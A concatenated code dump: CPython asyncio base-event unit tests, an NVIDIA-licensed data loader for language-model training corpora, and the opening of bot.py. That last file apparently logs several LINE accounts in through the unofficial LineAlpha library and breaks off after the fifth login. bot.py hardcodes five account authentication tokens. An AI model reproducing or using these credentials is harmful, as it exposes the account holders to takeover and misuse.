coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_address=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEADDR defaults to on for UNIX.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuse_address_default_on = (
os.name == 'posix' and sys.platform != 'cygwin')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuse_address_default_on:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
else:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True,
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False,
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_address=False,
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
with self.assertWarns(DeprecationWarning):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
corpora.py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""several datasets with preset arguments"""
from .datasets import json_dataset, csv_dataset
import os
import json
import random
import tqdm
from multiprocessing import Queue, Process
from queue import Empty
from collections import defaultdict
from torch.utils import data
from .lazy_loader import LazyLoader
from utils import print_rank_0
NUM_PROCESSES = 100
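# Pairs token sequences with run-length encoded loss masks: the stored mask lengths
# alternate between spans of 0s and spans of 1s and are expanded in __getitem__.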
class KeyDataset(data.Dataset):
def __init__(self, text_loader, mask_loader, **kwargs):
self.texts = text_loader
self.masks = mask_loader
self.is_lazy = False
if isinstance(self.texts, LazyLoader) and isinstance(self.masks, LazyLoader):
self.text_lens = self.texts.lens
self.is_lazy = True
def get_text_len(self, idx):
return self.text_lens[idx]
def __getitem__(self, index):
text = self.texts[index]
mask_length = self.masks[index]
mask = []
for i, length in enumerate(mask_length):
if i % 2 == 0:
mask += [0] * length
else:
mask += [1] * length
assert len(text) == len(mask)
return {"tokens": text, "loss_masks": mask}
def __len__(self):
return len(self.texts)
class PromptDataset(data.Dataset):
def __init__(self, prompt_loader, text_loader, tokenizer=None, to_tokenize=False, **kwargs):
self.prompts = prompt_loader
self.texts = text_loader
self.tokenizer = tokenizer
self.to_tokenize = to_tokenize
self.is_lazy = False
if isinstance(self.prompts, LazyLoader) and isinstance(self.texts, LazyLoader):
self.prompt_lens = self.prompts.lens
self.text_lens = self.texts.lens
self.is_lazy = True
def get_text_len(self, idx):
return self.prompt_lens[idx] + self.text_lens[idx]
def __getitem__(self, index):
prompt = self.prompts[index]
text = self.texts[index]
if self.to_tokenize:
prompt = self.tokenizer.EncodeAsIds(prompt).tokenization
text = self.tokenizer.EncodeAsIds(text).tokenization
return {"tokens": prompt + text, "loss_masks": [0] * len(prompt) + [1] * len(text)}
def __len__(self):
return len(self.prompts)
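# DataReader drives a producer/consumer preprocessing pipeline: a single reader
# process streams raw lines into task_queue, NUM_PROCESSES tokenize_worker
# processes turn them into samples on done_queue, and the main process writes
# each finished sample out through the supplied writers.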
class DataReader:
PATH = None
assert_str = None
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
raise NotImplementedError
def print_info(self, info):
pass
def __init__(self, writers, tokenizer=None, tokenize=False, **kwargs):
assert os.path.exists(self.PATH), self.assert_str
self.tokenizer = tokenizer
self.tokenize = tokenize
self.writers = writers
if os.path.isdir(self.PATH):
paths = [entry.path for entry in os.scandir(self.PATH) if
not entry.is_dir() and not entry.name.endswith("bz2")]
else:
paths = [self.PATH]
task_queue, done_queue, info_queue = Queue(maxsize=10000000), Queue(maxsize=10000000), Queue()
processes = []
for i in range(NUM_PROCESSES):
process = Process(target=self.tokenize_worker,
args=(task_queue, done_queue, info_queue, type(self), tokenizer, tokenize))
process.start()
processes.append(process)
def read_input_to_queue():
for path in paths:
print_rank_0(f"Start reading {path}")
with open(path) as file:
for row in file:
task_queue.put(row)
print_rank_0("Read input complete")
for i in range(len(processes)):
task_queue.put('STOP')
process = Process(target=read_input_to_queue)
process.start()
count = len(processes)
progress_bar = tqdm.tqdm()
while True:
data = done_queue.get()
if data == 'COMPLETE':
count -= 1
if count == 0:
break
else:
self.write_result(data, self.writers)
progress_bar.update()
progress_bar.close()
self.print_info(info_queue)
@staticmethod
def write_result(data, writers):
raise NotImplementedError
@staticmethod
def get_token_count(contents):
return sum(map(len, contents))
@staticmethod
def process_sample(text, tokenizer, tokenize):
if isinstance(text, str) and tokenize:
text = tokenizer.EncodeAsIds(text).tokenization if text else []
return text
@staticmethod
def trim_field(content, max_length):
if len(content) > max_length:
content = content[:max_length]
content += "......"
return content
@classmethod
def process_line(cls, data, tokenizer, tokenize):
raise NotImplementedError
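# PromptReader subclasses only implement process_line(); every input line (JSON by
# default) is turned into parallel lists of prompts and texts.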
class PromptReader(DataReader):
is_json = True
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
for row in iter(input.get, 'STOP'):
row = row.rstrip()
if row:
if cls.is_json:
row = json.loads(row)
prompts, texts = reader.process_line(row, tokenizer, tokenize)
for prompt, text in zip(prompts, texts):
output.put((prompt, text))
output.put("COMPLETE")
@staticmethod
def write_result(data, writers):
prompt, text = data
writers['prompt'].write(prompt)
writers['text'].write(text)
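# Reads wiki key/content records and emits a (summary, mask) pair followed by a
# (text, mask) pair, with each mask stored as alternating segment lengths.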
class KeyReader(DataReader):
PATH = '/root/data/wikipedia/wiki-key.txt'
assert_str = "make sure to set PATH for wikipedia data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
keys, contents = data['key'], data["content"]
assert len(keys) == len(contents)
for i in range(1, len(keys)):
keys[i] = " " + keys[i]
contents = [" " + content for content in contents]
keys = [tokenizer.EncodeAsIds(key).tokenization for key in keys]
contents = [tokenizer.EncodeAsIds(content).tokenization for content in contents]
summary = sum(keys, [])
summary_prefix = cls.process_sample("Summary: ", tokenizer, tokenize)
summary_mask = [len(summary_prefix), len(summary)]
summary = summary_prefix + summary
text, text_mask = [], []
for key, content in zip(keys, contents):
content = content + [tokenizer.get_command('eop').Id]
text += key
text += content
text_mask.append(len(key))
text_mask.append(len(content))
return (summary, summary_mask), (text, text_mask)
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
for row in iter(input.get, 'STOP'):
data = json.loads(row)
summary, content = reader.process_line(data, tokenizer, tokenize)
output.put((summary, content))
output.put("COMPLETE")
@staticmethod
def write_result(data, writers):
summary, content = data
writers['text'].write(summary[0])
writers['mask'].write(summary[1])
writers['text'].write(content[0])
writers['mask'].write(content[1])
class zhihu(PromptReader):
PATH = "/root/data/zhihu/zhihu"
# PATH = "data/zhihu/data.json"
assert_str = "make sure to set PATH for zhihu data_utils/corpora.py"
qtitle_prefix = "问题:"
qcontent_prefix = "问题描述:"
user_prefix = "回答用户:"
answer_prefix = " 回答:"
# qtitle_prefix = []
# qcontent_prefix = []
# user_prefix = []
# answer_prefix = []
@classmethod
def process_line(cls, data, tokenizer, tokenize):
prompts, texts = [], []
ans_length = len(data.get("ans-content", ""))
ans_up = data.get("ans-up-num", "")
ans_up = int(ans_up) if ans_up else 0
if ans_length > 100 or ans_up > 1000:
qtitle = data["q_title"]
qcontent = data["q-content"]
if qcontent is None:
qcontent = ""
qcontent = cls.trim_field(qcontent, max_length=100)
user = data.get("user-signature", "")
prompt = cls.qtitle_prefix + qtitle + cls.qcontent_prefix + qcontent + cls.user_prefix + user + cls.answer_prefix
text = data["ans-content"]
prompt, text = cls.process_sample(prompt, tokenizer, tokenize), cls.process_sample(text, tokenizer,
tokenize)
prompts.append(prompt)
texts.append(text)
# prompt = data["q_title"] + data["q-content"] + data["user-signature"]
# text = data["ans-content"]
# prompts.append(prompt)
# texts.append(text)
return prompts, texts
class zhidao(PromptReader):
PATH = "/root/data/zhidao/zhidao"
assert_str = "make sure to set PATH for zhidao data_utils/corpora.py"
qtitle_prefix = "问题:"
qcontent_prefix = "问题描述:"
answer_prefix = "回答:"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
if "title" not in data:
return [], []
prompts, texts = [], []
qtitle = data["title"]
qcontent = data.get("content", "")
qcontent = cls.trim_field(qcontent, max_length=100)
prompt = cls.qtitle_prefix + qtitle + cls.qcontent_prefix + qcontent + cls.answer_prefix
prompt = cls.process_sample(prompt, tokenizer, tokenize)
if "best_answer" in data:
text = data["best_answer"]["content"]
if len(text) > 10:
text = cls.process_sample(text, tokenizer, tokenize)
prompts.append(prompt)
texts.append(text)
for answer in data.get("other_answers", []):
text = answer["content"]
if len(text) > 100:
text = cls.process_sample(text, tokenizer, tokenize)
prompts.append(prompt)
texts.append(text)
return prompts, texts
class baike(PromptReader):
PATH = "/root/data/baike/baike"
assert_str = "make sure to set PATH for baike data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
prompts, texts = [], []
text = data.get("title", "") + data.get("abstract", "") + data.get("content", "")
if text:
p, t = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
prompts.append(p)
texts.append(t)
return prompts, texts
class wikipedia(PromptReader):
"""
dataset for wikipedia with arguments configured for convenience
command line usage: `--train-data wikipedia`
"""
# PATH = '/dataset/data/wiki.txt'
PATH = '/root/data/bert_data/wiki.txt'
assert_str = "make sure to set PATH for wikipedia data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
text = data['text']
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
class TestDataset(PromptReader):
PATH = '/root/data/test.json'
assert_str = "make sure to set PATH for wikipedia data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
prompt, text = data['prompt'], data['text']
prompt, text = cls.process_sample(prompt, tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
class OpenWebText(PromptReader):
PATH = '/root/data/openwebtext2'
assert_str = "make sure to set PATH for openwebtext data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
text = data['text']
if len(text) > 100:
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
else:
return [], []
class CCNews(PromptReader):
PATH = "/root/data/cc_news"
assert_str = "make sure to set PATH for cc-news data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
text = ""
title = data.get("title", None)
description = data.get("description", None)
maintext = data.get("maintext", None)
if title:
text += title.strip() + " "
if description and (not maintext or not maintext.startswith(description)):
text += description.strip() + " "
if maintext:
text += maintext
if len(text) > 100:
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
else:
return [], []
class BertData(PromptReader):
is_json = False
PATH = '/dataset/fd5061f6/english_data/wikibook'
@classmethod
def process_line(cls, data, tokenizer, tokenize):
if data:
prompt, text = "", data
prompt, text = cls.process_sample(prompt, tokenizer, tokenize), cls.process_sample(text, tokenizer,
tokenize)
return [prompt], [text]
else:
return [], []
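# The Pile reader drops the sources listed in filtered_sources, randomly
# downsamples the sources in downsample_sources, and reports per-source sample
# lengths through the info queue.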
class Pile(PromptReader):
is_json = True
PATH = "/dataset/fd5061f6/english_data/pile/train"
filtered_sources = ["Github", "StackExchange", "DM Mathematics", "Ubuntu IRC", "EuroParl", "YoutubeSubtitles",
"Enron Emails"]
downsample_sources = {"PubMed Central": 0.3, "ArXiv": 0.3, "FreeLaw": 0.3}
def print_info(self, info):
total_dict = defaultdict(int)
while True:
try:
source_dict = info.get(block=False)
for source, length in source_dict.items():
total_dict[source] += length
except Empty:
break
print_rank_0(total_dict)
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
source_dict = defaultdict(int)
for row in iter(input.get, 'STOP'):
row = row.rstrip()
if row:
if cls.is_json:
row = json.loads(row)
prompts, texts, source = reader.process_line(row, tokenizer, tokenize)
length = 0
for prompt, text in zip(prompts, texts):
length += len(text)
output.put((prompt, text))
if source:
source_dict[source] += length
output.put("COMPLETE")
info.put(source_dict)
@classmethod
def process_line(cls, data, tokenizer, tokenize):
source = data["meta"].get("pile_set_name", None)
text = data.get("text", None)
if source and text:
if source in cls.filtered_sources:
return [], [], None
elif source in cls.downsample_sources and random.random() > cls.downsample_sources[source]:
return [], [], None
else:
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer,
tokenize)
return [prompt], [text], source
else:
return [], [], None
class BertBaseData(BertData):
PATH = '/root/data/formatted_one_article_per_line'
class BertLargeData(BertData):
PATH = '/root/data/formatted_one_article_per_line_large'
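# Registry mapping the --train-data names to their corpus reader classes.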
NAMED_CORPORA = {
'wikipedia': wikipedia,
'wikipedia-key': KeyReader,
'openwebtext': OpenWebText,
"zhihu": zhihu,
"zhidao": zhidao,
"baike": baike,
"test": TestDataset,
'wikibook': BertData,
"bert-base": BertBaseData,
"bert-large": BertLargeData,
'cc-news': CCNews,
'pile': Pile
}
|
bot.py
|
# -*- coding: utf-8 -*-
import LineAlpha
from LineAlpha.lib.curve.ttypes import *
from datetime import datetime
from imgurpython import ImgurClient
import time,random,sys,json,codecs,threading,glob,os,subprocess,multiprocessing
cl = LineAlpha.LINE()
cl.login(token="EkeaUw67d8l1ksWaRIf9.VPm++2MfGJebW2j6OM3Qcq.N8RkI8fzMpTI6SkoxX1gg/yZcvpOp2GmCubdVUizk/I=")
cl.loginResult()
kk = LineAlpha.LINE()
kk.login(token="EkGIlVSPEV2reF9yJPV5.YmK3RE2Gh7r1rsdbSBQibq.tKU1hvspJfPh6q1vCZfK8M8+U0/B8bWA3FsxqPS7pMM=")
kk.loginResult()
ki = LineAlpha.LINE()
ki.login(token="EkRQbZZErjrx5uujDyza.84BapPm+V0nuPZ1PkEq6/G.V3aSBbMrbByVhVmOx9yrMp4S7FTJqw6cetH43/pOLEA=")
ki.loginResult()
kc = LineAlpha.LINE()
kc.login(token="EkZvZ7Hlj7m84MOx8yI1.O00VsLTlmX6iq84iusWZ4q.ScFSA8A8Qsbfp5hguvZI5/MZ3JkFwkM9PIvGyqC7Pi4=")
kc.loginResult()
kg = LineAlpha.LINE()
kg.login(token="EkpaxWwnqie6I5luusg7.St9fkz8GgIrWBhX+pEuGrW.Nho5QtsDAstF7T2MmUqC3ogYFUW7nw9yiu58tEARJZQ=")
